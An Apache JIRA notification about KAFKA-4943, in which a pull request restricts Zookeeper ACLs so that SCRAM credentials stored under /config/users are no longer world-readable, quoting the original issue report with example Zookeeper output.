[ https://issues.apache.org/jira/browse/KAFKA-4943?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15940828#comment-15940828 ]
ASF GitHub Bot commented on KAFKA-4943: --------------------------------------- GitHub user rajinisivaram opened a pull request: https://github.com/apache/kafka/pull/2733 KAFKA-4943: Make /config/users with SCRAM credentials not world-readable You can merge this pull request into a Git repository by running: $ git pull https://github.com/rajinisivaram/kafka KAFKA-4943 Alternatively you can review and apply these changes as the patch at: https://github.com/apache/kafka/pull/2733.patch To close this pull request, make a commit to your master/trunk branch with (at least) the following in the commit message: This closes #2733 ---- commit 8ab3c5ab5787e795bff779354ad34ca1921107a1 Author: Rajini Sivaram <rajinisiva...@googlemail.com> Date: 2017-03-24T15:44:49Z KAFKA-4943: Make /config/users with SCRAM credentials not world-readable ---- > SCRAM secret's should be better protected with Zookeeper ACLs > ------------------------------------------------------------- > > Key: KAFKA-4943 > URL: https://issues.apache.org/jira/browse/KAFKA-4943 > Project: Kafka > Issue Type: Improvement > Reporter: Johan Ström > Assignee: Rajini Sivaram > > With the new SCRAM authenticator the secrets are stored in Zookeeper: > {code} > get /kafka/config/users/alice > {"version":1,"config":{"SCRAM-SHA-512":"salt=ODhnZjNkdWZibTV1cG1zdnV6bmh6djF3Mg==,stored_key=BAbHWHuGEb4m5+U+p0M9oFQmOPhU6M7q5jtZY8deDDoZCvxaqVNLz41yPzdgcp1WpiEBmfwYOuFlo9hMFKM7mA==,server_key=JW3KhpMeyUgh0OAC0kejuFUvUSlXBv/Z68tlfOWcMw5f5jrBwyBnjNQ9VZsSYz1AcI9IYaQ5S6H3yN39SieNiA==,iterations=4096"}} > {code} > These are stored without any ACL, and zookeeper-security-migration.sh does > not seem to change that either: > {code} > getAcl /kafka/config/users/alice > 'world,'anyone > : cdrwa > getAcl /kafka/config/users > 'world,'anyone > : cdrwa > getAcl /kafka > 'world,'anyone > : r > 'sasl,'bob > : cdrwa > getAcl /kafka/config/changes > 'world,'anyone > : r > 'sasl,'bob > : cdrwa > {code} > The above output is after running security migrator, for some reason > /kafka/config/users is ignored, but others are fixed.. > Even if these where to be stored with secure ZkUtils#DefaultAcls, they would > be world readable. > From my (limited) point of view, they should be readable by Kafka only. -- This message was sent by Atlassian JIRA (v6.3.15#6346)